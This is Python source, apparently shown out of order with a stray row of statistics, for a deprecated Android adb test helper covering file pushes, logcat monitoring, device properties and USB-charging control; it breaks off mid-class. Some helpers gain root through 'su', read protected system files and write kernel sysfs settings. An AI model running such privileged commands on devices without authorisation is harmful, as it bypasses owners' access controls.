"""Sends keycode to the device.
Args:
keycode: Numeric keycode to send (see "enum" at top of file).
"""
self.RunShellCommand('input keyevent %d' % keycode)
def _RunMd5Sum(self, host_path, device_path):
"""Gets the md5sum of a host path and device path.
Args:
host_path: Path (file or directory) on the host.
device_path: Path on the device.
Returns:
A tuple containing lists of the host and device md5sum results as
created by _ParseMd5SumOutput().
"""
md5sum_dist_path = os.path.join(constants.GetOutDirectory(),
'md5sum_dist')
assert os.path.exists(md5sum_dist_path), 'Please build md5sum.'
md5sum_dist_mtime = os.stat(md5sum_dist_path).st_mtime
if (md5sum_dist_path not in self._push_if_needed_cache or
self._push_if_needed_cache[md5sum_dist_path] != md5sum_dist_mtime):
command = 'push %s %s' % (md5sum_dist_path, MD5SUM_DEVICE_FOLDER)
assert _HasAdbPushSucceeded(self._adb.SendCommand(command))
self._push_if_needed_cache[md5sum_dist_path] = md5sum_dist_mtime
(_, md5_device_output) = self.GetAndroidToolStatusAndOutput(
self._util_wrapper + ' ' + MD5SUM_DEVICE_PATH + ' ' + device_path,
lib_path=MD5SUM_DEVICE_FOLDER,
timeout_time=2 * 60)
device_hash_tuples = _ParseMd5SumOutput(md5_device_output)
assert os.path.exists(host_path), 'Local path not found %s' % host_path
md5sum_output = cmd_helper.GetCmdOutput(
[os.path.join(constants.GetOutDirectory(), 'md5sum_bin_host'),
host_path])
host_hash_tuples = _ParseMd5SumOutput(md5sum_output.splitlines())
return (host_hash_tuples, device_hash_tuples)
def GetFilesChanged(self, host_path, device_path, ignore_filenames=False):
"""Compares the md5sum of a host path against a device path.
Note: Ignores extra files on the device.
Args:
host_path: Path (file or directory) on the host.
device_path: Path on the device.
ignore_filenames: If True only the file contents are considered when
checking whether a file has changed, otherwise the relative path
must also match.
Returns:
A list of tuples of the form (host_path, device_path) for files whose
md5sums do not match.
"""
# Md5Sum resolves symbolic links in path names so the calculation of
# relative path names from its output will need the real path names of the
# base directories. Having calculated these they are used throughout the
# function since this makes us less subject to any future changes to Md5Sum.
real_host_path = os.path.realpath(host_path)
real_device_path = self.RunShellCommand('realpath "%s"' % device_path)[0]
host_hash_tuples, device_hash_tuples = self._RunMd5Sum(
real_host_path, real_device_path)
if len(host_hash_tuples) > len(device_hash_tuples):
logging.info('%s files do not exist on the device' %
(len(host_hash_tuples) - len(device_hash_tuples)))
host_rel = [(os.path.relpath(os.path.normpath(t.path), real_host_path),
t.hash)
for t in host_hash_tuples]
if os.path.isdir(real_host_path):
def RelToRealPaths(rel_path):
return (os.path.join(real_host_path, rel_path),
os.path.join(real_device_path, rel_path))
else:
assert len(host_rel) == 1
def RelToRealPaths(_):
return (real_host_path, real_device_path)
if ignore_filenames:
# If we are ignoring file names, then we want to push any file for which
# a file with an equivalent MD5 sum does not exist on the device.
device_hashes = set([h.hash for h in device_hash_tuples])
ShouldPush = lambda p, h: h not in device_hashes
else:
# Otherwise, we want to push any file on the host for which a file with
# an equivalent MD5 sum does not exist at the same relative path on the
# device.
device_rel = dict([(os.path.relpath(os.path.normpath(t.path),
real_device_path),
t.hash)
for t in device_hash_tuples])
ShouldPush = lambda p, h: p not in device_rel or h != device_rel[p]
return [RelToRealPaths(path) for path, host_hash in host_rel
if ShouldPush(path, host_hash)]
def PushIfNeeded(self, host_path, device_path):
"""Pushes |host_path| to |device_path|.
Works for files and directories. This method skips copying any paths in
|test_data_paths| that already exist on the device with the same hash.
All pushed files can be removed by calling RemovePushedFiles().
"""
MAX_INDIVIDUAL_PUSHES = 50
if not os.path.exists(host_path):
raise device_errors.CommandFailedError(
'Local path not found %s' % host_path, device=str(self))
# See if the file on the host changed since the last push (if any) and
# return early if it didn't. Note that this shortcut assumes that the tests
# on the device don't modify the files.
if not os.path.isdir(host_path):
if host_path in self._push_if_needed_cache:
host_path_mtime = self._push_if_needed_cache[host_path]
if host_path_mtime == os.stat(host_path).st_mtime:
return
size = host_utils.GetRecursiveDiskUsage(host_path)
self._pushed_files.append(device_path)
self._potential_push_size += size
if os.path.isdir(host_path):
self.RunShellCommand('mkdir -p "%s"' % device_path)
changed_files = self.GetFilesChanged(host_path, device_path)
logging.info('Found %d files that need to be pushed to %s',
len(changed_files), device_path)
if not changed_files:
return
def Push(host, device):
# NOTE: We can't use adb_interface.Push() because it hardcodes a timeout
# of 60 seconds which isn't sufficient for a lot of users of this method.
push_command = 'push %s %s' % (host, device)
self._LogShell(push_command)
# Retry push with increasing backoff if the device is busy.
retry = 0
while True:
output = self._adb.SendCommand(push_command, timeout_time=30 * 60)
if _HasAdbPushSucceeded(output):
if not os.path.isdir(host_path):
self._push_if_needed_cache[host] = os.stat(host).st_mtime
return
if retry < 3:
retry += 1
wait_time = 5 * retry
logging.error('Push failed, retrying in %d seconds: %s' %
(wait_time, output))
time.sleep(wait_time)
else:
raise Exception('Push failed: %s' % output)
diff_size = 0
if len(changed_files) <= MAX_INDIVIDUAL_PUSHES:
diff_size = sum(host_utils.GetRecursiveDiskUsage(f[0])
for f in changed_files)
# TODO(craigdh): Replace this educated guess with a heuristic that
# approximates the push time for each method.
if len(changed_files) > MAX_INDIVIDUAL_PUSHES or diff_size > 0.5 * size:
self._actual_push_size += size
Push(host_path, device_path)
else:
for f in changed_files:
Push(f[0], f[1])
self._actual_push_size += diff_size
def GetPushSizeInfo(self):
"""Get total size of pushes to the device done via PushIfNeeded()
Returns:
A tuple:
1. Total size of push requests to PushIfNeeded (MB)
2. Total size that was actually pushed (MB)
"""
return (self._potential_push_size, self._actual_push_size)
def GetFileContents(self, filename, log_result=False):
"""Gets contents from the file specified by |filename|."""
return self.RunShellCommand('cat "%s" 2>/dev/null' % filename,
log_result=log_result)
def SetFileContents(self, filename, contents):
"""Writes |contents| to the file specified by |filename|."""
with tempfile.NamedTemporaryFile() as f:
f.write(contents)
f.flush()
self._adb.Push(f.name, filename)
def RunShellCommandWithSU(self, command, timeout_time=20, log_result=False):
return self.RunShellCommand('su -c %s' % command, timeout_time, log_result)
def CanAccessProtectedFileContents(self):
"""Returns True if Get/SetProtectedFileContents would work via "su" or adb
shell running as root.
Devices running user builds don't have adb root, but may provide "su" which
can be used for accessing protected files.
"""
return (self._GetProtectedFileCommandRunner() != None)
def _GetProtectedFileCommandRunner(self):
"""Finds the best method to access protected files on the device.
Returns:
1. None when privileged files cannot be accessed on the device.
2. Otherwise: A function taking a single parameter: a string with command
line arguments. Running that function executes the command with
the appropriate method.
"""
if self._protected_file_access_method_initialized:
return self._privileged_command_runner
self._privileged_command_runner = None
self._protected_file_access_method_initialized = True
for cmd in [self.RunShellCommand, self.RunShellCommandWithSU]:
# Get contents of the auxv vector for the init(8) process from a small
# binary file that always exists on linux and is always read-protected.
contents = cmd('cat /proc/1/auxv')
# The leading 4 or 8-bytes of auxv vector is a_type. There are not many
# reserved a_type values, hence byte 2 must always be '\0' for a realistic
# auxv. See /usr/include/elf.h.
if len(contents) > 0 and (contents[0][2] == '\0'):
self._privileged_command_runner = cmd
break
return self._privileged_command_runner
def GetProtectedFileContents(self, filename):
"""Gets contents from the protected file specified by |filename|.
This is potentially less efficient than GetFileContents.
"""
command = 'cat "%s" 2> /dev/null' % filename
command_runner = self._GetProtectedFileCommandRunner()
if command_runner:
return command_runner(command)
else:
logging.warning('Could not access protected file: %s' % filename)
return []
def SetProtectedFileContents(self, filename, contents):
"""Writes |contents| to the protected file specified by |filename|.
This is less efficient than SetFileContents.
"""
with DeviceTempFile(self) as temp_file:
with DeviceTempFile(self, suffix=".sh") as temp_script:
# Put the contents in a temporary file
self.SetFileContents(temp_file.name, contents)
# Create a script to copy the file contents to its final destination
self.SetFileContents(temp_script.name,
'cat %s > %s' % (temp_file.name, filename))
command = 'sh %s' % temp_script.name
command_runner = self._GetProtectedFileCommandRunner()
if command_runner:
return command_runner(command)
else:
logging.warning(
'Could not set contents of protected file: %s' % filename)
def RemovePushedFiles(self):
"""Removes all files pushed with PushIfNeeded() from the device."""
for p in self._pushed_files:
self.RunShellCommand('rm -r %s' % p, timeout_time=2 * 60)
def ListPathContents(self, path):
"""Lists files in all subdirectories of |path|.
Args:
path: The path to list.
Returns:
A dict of {"name": (size, lastmod), ...}.
"""
# Example output:
# /foo/bar:
# -rw-r----- user group 102 2011-05-12 12:29:54.131623387 +0100 baz.txt
re_file = re.compile('^-(?P<perms>[^\s]+)\s+'
'(?P<user>[^\s]+)\s+'
'(?P<group>[^\s]+)\s+'
'(?P<size>[^\s]+)\s+'
'(?P<date>[^\s]+)\s+'
'(?P<time>[^\s]+)\s+'
'(?P<filename>[^\s]+)$')
return _GetFilesFromRecursiveLsOutput(
path, self.RunShellCommand('ls -lR %s' % path), re_file,
self.GetUtcOffset())
def GetUtcOffset(self):
if not self._device_utc_offset:
self._device_utc_offset = self.RunShellCommand('date +%z')[0]
return self._device_utc_offset
def SetJavaAssertsEnabled(self, enable):
"""Sets or removes the device java assertions property.
Args:
enable: If True the property will be set.
Returns:
True if the file was modified (reboot is required for it to take effect).
"""
# First ensure the desired property is persisted.
temp_props_file = tempfile.NamedTemporaryFile()
properties = ''
if self._adb.Pull(LOCAL_PROPERTIES_PATH, temp_props_file.name):
with open(temp_props_file.name) as f:
properties = f.read()
re_search = re.compile(r'^\s*' + re.escape(JAVA_ASSERT_PROPERTY) +
r'\s*=\s*all\s*$', re.MULTILINE)
if enable != bool(re.search(re_search, properties)):
re_replace = re.compile(r'^\s*' + re.escape(JAVA_ASSERT_PROPERTY) +
r'\s*=\s*\w+\s*$', re.MULTILINE)
properties = re.sub(re_replace, '', properties)
if enable:
properties += '\n%s=all\n' % JAVA_ASSERT_PROPERTY
file(temp_props_file.name, 'w').write(properties)
self._adb.Push(temp_props_file.name, LOCAL_PROPERTIES_PATH)
# Next, check the current runtime value is what we need, and
# if not, set it and report that a reboot is required.
was_set = 'all' in self.system_properties[JAVA_ASSERT_PROPERTY]
if was_set == enable:
return False
self.system_properties[JAVA_ASSERT_PROPERTY] = enable and 'all' or ''
return True
def GetBuildId(self):
"""Returns the build ID of the system (e.g. JRM79C)."""
build_id = self.system_properties['ro.build.id']
assert build_id
return build_id
def GetBuildType(self):
"""Returns the build type of the system (e.g. eng)."""
build_type = self.system_properties['ro.build.type']
assert build_type
return build_type
def GetBuildProduct(self):
"""Returns the build product of the device (e.g. maguro)."""
build_product = self.system_properties['ro.build.product']
assert build_product
return build_product
def GetProductName(self):
"""Returns the product name of the device (e.g. takju)."""
name = self.system_properties['ro.product.name']
assert name
return name
def GetBuildFingerprint(self):
"""Returns the build fingerprint of the device."""
build_fingerprint = self.system_properties['ro.build.fingerprint']
assert build_fingerprint
return build_fingerprint
def GetDescription(self):
"""Returns the description of the system.
For example, "yakju-userdebug 4.1 JRN54F 364167 dev-keys".
"""
description = self.system_properties['ro.build.description']
assert description
return description
def GetProductModel(self):
"""Returns the name of the product model (e.g. "Galaxy Nexus") """
model = self.system_properties['ro.product.model']
assert model
return model
def GetWifiIP(self):
"""Returns the wifi IP on the device."""
wifi_ip = self.system_properties['dhcp.wlan0.ipaddress']
# Do not assert here. Devices (e.g. emulators) may not have a WifiIP.
return wifi_ip
def GetSubscriberInfo(self):
"""Returns the device subscriber info (e.g. GSM and device ID) as string."""
iphone_sub = self.RunShellCommand('dumpsys iphonesubinfo')
# Do not assert here. Devices (e.g. Nakasi on K) may not have iphonesubinfo.
return '\n'.join(iphone_sub)
def GetBatteryInfo(self):
"""Returns a {str: str} dict of battery info (e.g. status, level, etc)."""
battery = self.RunShellCommand('dumpsys battery')
assert battery
battery_info = {}
for line in battery[1:]:
k, _, v = line.partition(': ')
battery_info[k.strip()] = v.strip()
return battery_info
def GetSetupWizardStatus(self):
"""Returns the status of the device setup wizard (e.g. DISABLED)."""
status = self.system_properties['ro.setupwizard.mode']
# On some devices, the status is empty if not otherwise set. In such cases
# the caller should expect an empty string to be returned.
return status
def StartMonitoringLogcat(self, clear=True, logfile=None, filters=None):
"""Starts monitoring the output of logcat, for use with WaitForLogMatch.
Args:
clear: If True the existing logcat output will be cleared, to avoiding
matching historical output lurking in the log.
filters: A list of logcat filters to be used.
"""
if clear:
self.RunShellCommand('logcat -c')
args = []
if self._adb._target_arg:
args += shlex.split(self._adb._target_arg)
args += ['logcat', '-v', 'threadtime']
if filters:
args.extend(filters)
else:
args.append('*:v')
if logfile:
logfile = NewLineNormalizer(logfile)
# Spawn logcat and synchronize with it.
for _ in range(4):
self._logcat = pexpect.spawn(constants.GetAdbPath(), args, timeout=10,
logfile=logfile)
if not clear or self.SyncLogCat():
break
self._logcat.close(force=True)
else:
logging.critical('Error reading from logcat: ' + str(self._logcat.match))
sys.exit(1)
def SyncLogCat(self):
"""Synchronize with logcat.
Synchronize with the monitored logcat so that WaitForLogMatch will only
consider new message that are received after this point in time.
Returns:
True if the synchronization succeeded.
"""
assert self._logcat
tag = 'logcat_sync_%s' % time.time()
self.RunShellCommand('log ' + tag)
return self._logcat.expect([tag, pexpect.EOF, pexpect.TIMEOUT]) == 0
def GetMonitoredLogCat(self):
"""Returns an "adb logcat" command as created by pexpected.spawn."""
if not self._logcat:
self.StartMonitoringLogcat(clear=False)
return self._logcat
def WaitForLogMatch(self, success_re, error_re, clear=False, timeout=10):
"""Blocks until a matching line is logged or a timeout occurs.
Args:
success_re: A compiled re to search each line for.
error_re: A compiled re which, if found, terminates the search for
|success_re|. If None is given, no error condition will be detected.
clear: If True the existing logcat output will be cleared, defaults to
false.
timeout: Timeout in seconds to wait for a log match.
Raises:
pexpect.TIMEOUT after |timeout| seconds without a match for |success_re|
or |error_re|.
Returns:
The re match object if |success_re| is matched first or None if |error_re|
is matched first.
"""
logging.info('<<< Waiting for logcat:' + str(success_re.pattern))
t0 = time.time()
while True:
if not self._logcat:
self.StartMonitoringLogcat(clear)
try:
while True:
# Note this will block for upto the timeout _per log line_, so we need
# to calculate the overall timeout remaining since t0.
time_remaining = t0 + timeout - time.time()
if time_remaining < 0:
raise pexpect.TIMEOUT(self._logcat)
self._logcat.expect(PEXPECT_LINE_RE, timeout=time_remaining)
line = self._logcat.match.group(1)
if error_re:
error_match = error_re.search(line)
if error_match:
return None
success_match = success_re.search(line)
if success_match:
return success_match
logging.info('<<< Skipped Logcat Line:' + str(line))
except pexpect.TIMEOUT:
raise pexpect.TIMEOUT(
'Timeout (%ds) exceeded waiting for pattern "%s" (tip: use -vv '
'to debug)' %
(timeout, success_re.pattern))
except pexpect.EOF:
# It seems that sometimes logcat can end unexpectedly. This seems
# to happen during Chrome startup after a reboot followed by a cache
# clean. I don't understand why this happens, but this code deals with
# getting EOF in logcat.
logging.critical('Found EOF in adb logcat. Restarting...')
# Rerun spawn with original arguments. Note that self._logcat.args[0] is
# the path of adb, so we don't want it in the arguments.
self._logcat = pexpect.spawn(constants.GetAdbPath(),
self._logcat.args[1:],
timeout=self._logcat.timeout,
logfile=self._logcat.logfile)
def StartRecordingLogcat(self, clear=True, filters=None):
"""Starts recording logcat output to eventually be saved as a string.
This call should come before some series of tests are run, with either
StopRecordingLogcat or SearchLogcatRecord following the tests.
Args:
clear: True if existing log output should be cleared.
filters: A list of logcat filters to be used.
"""
if not filters:
filters = ['*:v']
if clear:
self._adb.SendCommand('logcat -c')
logcat_command = 'adb %s logcat -v threadtime %s' % (self._adb._target_arg,
' '.join(filters))
self._logcat_tmpoutfile = tempfile.NamedTemporaryFile(bufsize=0)
self.logcat_process = subprocess.Popen(logcat_command, shell=True,
stdout=self._logcat_tmpoutfile)
def GetCurrentRecordedLogcat(self):
"""Return the current content of the logcat being recorded.
Call this after StartRecordingLogcat() and before StopRecordingLogcat().
This can be useful to perform timed polling/parsing.
Returns:
Current logcat output as a single string, or None if
StopRecordingLogcat() was already called.
"""
if not self._logcat_tmpoutfile:
return None
with open(self._logcat_tmpoutfile.name) as f:
return f.read()
def StopRecordingLogcat(self):
"""Stops an existing logcat recording subprocess and returns output.
Returns:
The logcat output as a string or an empty string if logcat was not
being recorded at the time.
"""
if not self.logcat_process:
return ''
# Cannot evaluate directly as 0 is a possible value.
# Better to read the self.logcat_process.stdout before killing it,
# Otherwise the communicate may return incomplete output due to pipe break.
if self.logcat_process.poll() is None:
self.logcat_process.kill()
self.logcat_process.wait()
self.logcat_process = None
self._logcat_tmpoutfile.seek(0)
output = self._logcat_tmpoutfile.read()
self._logcat_tmpoutfile.close()
self._logcat_tmpoutfile = None
return output
@staticmethod
def SearchLogcatRecord(record, message, thread_id=None, proc_id=None,
log_level=None, component=None):
"""Searches the specified logcat output and returns results.
This method searches through the logcat output specified by record for a
certain message, narrowing results by matching them against any other
specified criteria. It returns all matching lines as described below.
Args:
record: A string generated by Start/StopRecordingLogcat to search.
message: An output string to search for.
thread_id: The thread id that is the origin of the message.
proc_id: The process that is the origin of the message.
log_level: The log level of the message.
component: The name of the component that would create the message.
Returns:
A list of dictionaries represeting matching entries, each containing keys
thread_id, proc_id, log_level, component, and message.
"""
if thread_id:
thread_id = str(thread_id)
if proc_id:
proc_id = str(proc_id)
results = []
reg = re.compile('(\d+)\s+(\d+)\s+([A-Z])\s+([A-Za-z]+)\s*:(.*)$',
re.MULTILINE)
log_list = reg.findall(record)
for (tid, pid, log_lev, comp, msg) in log_list:
if ((not thread_id or thread_id == tid) and
(not proc_id or proc_id == pid) and
(not log_level or log_level == log_lev) and
(not component or component == comp) and msg.find(message) > -1):
match = dict({'thread_id': tid, 'proc_id': pid,
'log_level': log_lev, 'component': comp,
'message': msg})
results.append(match)
return results
def ExtractPid(self, process_name):
"""Extracts Process Ids for a given process name from Android Shell.
Args:
process_name: name of the process on the device.
Returns:
List of all the process ids (as strings) that match the given name.
If the name of a process exactly matches the given name, the pid of
that process will be inserted to the front of the pid list.
"""
pids = []
for line in self.RunShellCommand('ps', log_result=False):
data = line.split()
try:
if process_name in data[-1]: # name is in the last column
if process_name == data[-1]:
pids.insert(0, data[1]) # PID is in the second column
else:
pids.append(data[1])
except IndexError:
pass
return pids
def GetIoStats(self):
"""Gets cumulative disk IO stats since boot (for all processes).
Returns:
Dict of {num_reads, num_writes, read_ms, write_ms} or None if there
was an error.
"""
IoStats = collections.namedtuple(
'IoStats',
['device',
'num_reads_issued',
'num_reads_merged',
'num_sectors_read',
'ms_spent_reading',
'num_writes_completed',
'num_writes_merged',
'num_sectors_written',
'ms_spent_writing',
'num_ios_in_progress',
'ms_spent_doing_io',
'ms_spent_doing_io_weighted',
])
for line in self.GetFileContents('/proc/diskstats', log_result=False):
fields = line.split()
stats = IoStats._make([fields[2]] + [int(f) for f in fields[3:]])
if stats.device == 'mmcblk0':
return {
'num_reads': stats.num_reads_issued,
'num_writes': stats.num_writes_completed,
'read_ms': stats.ms_spent_reading,
'write_ms': stats.ms_spent_writing,
}
logging.warning('Could not find disk IO stats.')
return None
def GetMemoryUsageForPid(self, pid):
"""Returns the memory usage for given pid.
Args:
pid: The pid number of the specific process running on device.
Returns:
Dict of {metric:usage_kb}, for the process which has specified pid.
The metric keys which may be included are: Size, Rss, Pss, Shared_Clean,
Shared_Dirty, Private_Clean, Private_Dirty, VmHWM.
"""
showmap = self.RunShellCommand('showmap %d' % pid)
if not showmap or not showmap[-1].endswith('TOTAL'):
logging.warning('Invalid output for showmap %s', str(showmap))
return {}
items = showmap[-1].split()
if len(items) != 9:
logging.warning('Invalid TOTAL for showmap %s', str(items))
return {}
usage_dict = collections.defaultdict(int)
usage_dict.update({
'Size': int(items[0].strip()),
'Rss': int(items[1].strip()),
'Pss': int(items[2].strip()),
'Shared_Clean': int(items[3].strip()),
'Shared_Dirty': int(items[4].strip()),
'Private_Clean': int(items[5].strip()),
'Private_Dirty': int(items[6].strip()),
})
peak_value_kb = 0
for line in self.GetProtectedFileContents('/proc/%s/status' % pid):
if not line.startswith('VmHWM:'): # Format: 'VmHWM: +[0-9]+ kB'
continue
peak_value_kb = int(line.split(':')[1].strip().split(' ')[0])
break
usage_dict['VmHWM'] = peak_value_kb
if not peak_value_kb:
logging.warning('Could not find memory peak value for pid ' + str(pid))
return usage_dict
def ProcessesUsingDevicePort(self, device_port):
"""Lists processes using the specified device port on loopback interface.
Args:
device_port: Port on device we want to check.
Returns:
A list of (pid, process_name) tuples using the specified port.
"""
tcp_results = self.RunShellCommand('cat /proc/net/tcp', log_result=False)
tcp_address = '0100007F:%04X' % device_port
pids = []
for single_connect in tcp_results:
connect_results = single_connect.split()
# Column 1 is the TCP port, and Column 9 is the inode of the socket
if connect_results[1] == tcp_address:
socket_inode = connect_results[9]
socket_name = 'socket:[%s]' % socket_inode
lsof_results = self.RunShellCommand('lsof', log_result=False)
for single_process in lsof_results:
process_results = single_process.split()
# Ignore the line if it has less than nine columns in it, which may
# be the case when a process stops while lsof is executing.
if len(process_results) <= 8:
continue
# Column 0 is the executable name
# Column 1 is the pid
# Column 8 is the Inode in use
if process_results[8] == socket_name:
pids.append((int(process_results[1]), process_results[0]))
break
logging.info('PidsUsingDevicePort: %s', pids)
return pids
def FileExistsOnDevice(self, file_name):
"""Checks whether the given file exists on the device.
Args:
file_name: Full path of file to check.
Returns:
True if the file exists, False otherwise.
"""
assert '"' not in file_name, 'file_name cannot contain double quotes'
try:
status = self._adb.SendShellCommand(
'\'test -e "%s"; echo $?\'' % (file_name))
if 'test: not found' not in status:
return int(status) == 0
status = self._adb.SendShellCommand(
'\'ls "%s" >/dev/null 2>&1; echo $?\'' % (file_name))
return int(status) == 0
except ValueError:
if IsDeviceAttached(self._device):
raise errors.DeviceUnresponsiveError('Device may be offline.')
return False
def IsFileWritableOnDevice(self, file_name):
"""Checks whether the given file (or directory) is writable on the device.
Args:
file_name: Full path of file/directory to check.
Returns:
True if writable, False otherwise.
"""
assert '"' not in file_name, 'file_name cannot contain double quotes'
try:
status = self._adb.SendShellCommand(
'\'test -w "%s"; echo $?\'' % (file_name))
if 'test: not found' not in status:
return int(status) == 0
raise errors.AbortError('"test" binary not found. OS too old.')
except ValueError:
if IsDeviceAttached(self._device):
raise errors.DeviceUnresponsiveError('Device may be offline.')
return False
@staticmethod
def GetTimestamp():
return time.strftime('%Y-%m-%d-%H%M%S', time.localtime())
@staticmethod
def EnsureHostDirectory(host_file):
host_dir = os.path.dirname(os.path.abspath(host_file))
if not os.path.exists(host_dir):
os.makedirs(host_dir)
def TakeScreenshot(self, host_file=None):
"""Saves a screenshot image to |host_file| on the host.
Args:
host_file: Absolute path to the image file to store on the host or None to
use an autogenerated file name.
Returns:
Resulting host file name of the screenshot.
"""
host_file = os.path.abspath(host_file or
'screenshot-%s.png' % self.GetTimestamp())
self.EnsureHostDirectory(host_file)
device_file = '%s/screenshot.png' % self.GetExternalStorage()
self.RunShellCommand(
'/system/bin/screencap -p %s' % device_file)
self.PullFileFromDevice(device_file, host_file)
self.RunShellCommand('rm -f "%s"' % device_file)
return host_file
def PullFileFromDevice(self, device_file, host_file):
"""Download |device_file| on the device from to |host_file| on the host.
Args:
device_file: Absolute path to the file to retrieve from the device.
host_file: Absolute path to the file to store on the host.
"""
if not self._adb.Pull(device_file, host_file):
raise device_errors.AdbCommandFailedError(
['pull', device_file, host_file], 'Failed to pull file from device.')
assert os.path.exists(host_file)
def SetUtilWrapper(self, util_wrapper):
"""Sets a wrapper prefix to be used when running a locally-built
binary on the device (ex.: md5sum_bin).
"""
self._util_wrapper = util_wrapper
def RunUIAutomatorTest(self, test, test_package, timeout):
"""Runs a single uiautomator test.
Args:
test: Test class/method.
test_package: Name of the test jar.
timeout: Timeout time in seconds.
Returns:
An instance of am_instrument_parser.TestResult object.
"""
cmd = 'uiautomator runtest %s -e class %s' % (test_package, test)
self._LogShell(cmd)
output = self._adb.SendShellCommand(cmd, timeout_time=timeout)
# uiautomator doesn't fully conform to the instrumenation test runner
# convention and doesn't terminate with INSTRUMENTATION_CODE.
# Just assume the first result is valid.
(test_results, _) = am_instrument_parser.ParseAmInstrumentOutput(output)
if not test_results:
raise errors.InstrumentationError(
'no test results... device setup correctly?')
return test_results[0]
def DismissCrashDialogIfNeeded(self):
"""Dismiss the error/ANR dialog if present.
Returns: Name of the crashed package if a dialog is focused,
None otherwise.
"""
re_focus = re.compile(
r'\s*mCurrentFocus.*Application (Error|Not Responding): (\S+)}')
def _FindFocusedWindow():
match = None
for line in self.RunShellCommand('dumpsys window windows'):
match = re.match(re_focus, line)
if match:
break
return match
match = _FindFocusedWindow()
if not match:
return
package = match.group(2)
logging.warning('Trying to dismiss %s dialog for %s' % match.groups())
self.SendKeyEvent(KEYCODE_DPAD_RIGHT)
self.SendKeyEvent(KEYCODE_DPAD_RIGHT)
self.SendKeyEvent(KEYCODE_ENTER)
match = _FindFocusedWindow()
if match:
logging.error('Still showing a %s dialog for %s' % match.groups())
return package
def EfficientDeviceDirectoryCopy(self, source, dest):
""" Copy a directory efficiently on the device
Uses a shell script running on the target to copy new and changed files the
source directory to the destination directory and remove added files. This
is in some cases much faster than cp -r.
Args:
source: absolute path of source directory
dest: absolute path of destination directory
"""
logging.info('In EfficientDeviceDirectoryCopy %s %s', source, dest)
with DeviceTempFile(self, suffix=".sh") as temp_script_file:
host_script_path = os.path.join(constants.DIR_SOURCE_ROOT,
'build',
'android',
'pylib',
'efficient_android_directory_copy.sh')
self._adb.Push(host_script_path, temp_script_file.name)
out = self.RunShellCommand(
'sh %s %s %s' % (temp_script_file.name, source, dest),
timeout_time=120)
if self._device:
device_repr = self._device[-4:]
else:
device_repr = '????'
for line in out:
logging.info('[%s]> %s', device_repr, line)
def _GetControlUsbChargingCommand(self):
if self._control_usb_charging_command['cached']:
return self._control_usb_charging_command['command']
self._control_usb_charging_command['cached'] = True
if not self.IsRootEnabled():
return None
for command in CONTROL_USB_CHARGING_COMMANDS:
# Assert command is valid.
assert 'disable_command' in command
assert 'enable_command' in command
assert 'witness_file' in command
witness_file = command['witness_file']
if self.FileExistsOnDevice(witness_file):
self._control_usb_charging_command['command'] = command
return command
return None
def CanControlUsbCharging(self):
return self._GetControlUsbChargingCommand() is not None
def DisableUsbCharging(self, timeout=10):
command = self._GetControlUsbChargingCommand()
if not command:
raise Exception('Unable to act on usb charging.')
disable_command = command['disable_command']
t0 = time.time()
# Do not loop directly on self.IsDeviceCharging to cut the number of calls
# to the device.
while True:
if t0 + timeout - time.time() < 0:
raise pexpect.TIMEOUT('Unable to disable USB charging in time: %s' % (
self.GetBatteryInfo()))
self.RunShellCommand(disable_command)
if not self.IsDeviceCharging():
break
def EnableUsbCharging(self, timeout=10):
command = self._GetControlUsbChargingCommand()
if not command:
raise Exception('Unable to act on usb charging.')
disable_command = command['enable_command']
t0 = time.time()
# Do not loop directly on self.IsDeviceCharging to cut the number of calls
# to the device.
while True:
if t0 + timeout - time.time() < 0:
raise pexpect.TIMEOUT('Unable to enable USB charging in time.')
self.RunShellCommand(disable_command)
if self.IsDeviceCharging():
break
def IsDeviceCharging(self):
for line in self.RunShellCommand('dumpsys battery'):
if 'powered: ' in line:
if line.split('powered: ')[1] == 'true':
return True
class NewLineNormalizer(object):
"""A file-like object to normalize EOLs to '\n'.
Pexpect runs adb within a pseudo-tty device (see
http://www.noah.org/wiki/pexpect), so any '\n' printed by adb is written
as '\r\n' to the logfile. Since adb already uses '\r\n' to terminate
lines, the log ends up having '\r\r\n' at the end of each line. This
filter replaces the above with a single '\n' in the data stream.
"""
def __init__(self, output):
self._output = output
def write(self, data):
data = data.replace('\r\r\n', '\n')
self._output.write(data)
def flush(self):
self._output.flush()
| 36.983814
| 80
| 0.659983
|
"""Provides an interface to communicate with the device via the adb command.
Assumes adb binary is currently on system path.
Note that this module is deprecated.
"""
import collections
import datetime
import inspect
import logging
import os
import random
import re
import shlex
import signal
import subprocess
import sys
import tempfile
import time
import cmd_helper
import constants
import system_properties
from utils import host_utils
try:
from pylib import pexpect
except ImportError:
pexpect = None
sys.path.append(os.path.join(
constants.DIR_SOURCE_ROOT, 'third_party', 'android_testrunner'))
import adb_interface
import am_instrument_parser
import errors
from pylib.device import device_blacklist
from pylib.device import device_errors
# see http://www.noah.org/python/pexpect/#doc for explanation why.
PEXPECT_LINE_RE = re.compile('\n([^\r]*)\r')
# Set the adb shell prompt to be a unique marker that will [hopefully] not
# appear at the start of any line of a command's output.
SHELL_PROMPT = '~+~PQ\x17RS~+~'
LOCAL_PROPERTIES_PATH = constants.DEVICE_LOCAL_PROPERTIES_PATH
JAVA_ASSERT_PROPERTY = 'dalvik.vm.enableassertions'
KEYCODE_HOME = 3
KEYCODE_BACK = 4
KEYCODE_DPAD_UP = 19
KEYCODE_DPAD_DOWN = 20
KEYCODE_DPAD_RIGHT = 22
KEYCODE_ENTER = 66
KEYCODE_MENU = 82
MD5SUM_DEVICE_FOLDER = constants.TEST_EXECUTABLE_DIR + '/md5sum/'
MD5SUM_DEVICE_PATH = MD5SUM_DEVICE_FOLDER + 'md5sum_bin'
PIE_WRAPPER_PATH = constants.TEST_EXECUTABLE_DIR + '/run_pie'
CONTROL_USB_CHARGING_COMMANDS = [
{
'witness_file': '/sys/module/pm8921_charger/parameters/disabled',
'enable_command': 'echo 0 > /sys/module/pm8921_charger/parameters/disabled',
'disable_command':
'echo 1 > /sys/module/pm8921_charger/parameters/disabled',
},
{
'witness_file': '/sys/kernel/debug/bq24192/INPUT_SRC_CONT',
'enable_command': (
'echo 0x4A > /sys/kernel/debug/bq24192/INPUT_SRC_CONT && '
'echo 1 > /sys/class/power_supply/usb/online'),
'disable_command': (
'echo 0xCA > /sys/kernel/debug/bq24192/INPUT_SRC_CONT && '
'chmod 644 /sys/class/power_supply/usb/online && '
'echo 0 > /sys/class/power_supply/usb/online'),
},
]
class DeviceTempFile(object):
def __init__(self, android_commands, prefix='temp_file', suffix=''):
"""Find an unused temporary file path in the devices external directory.
When this object is closed, the file will be deleted on the device.
"""
self.android_commands = android_commands
while True:
# expected to never happen.
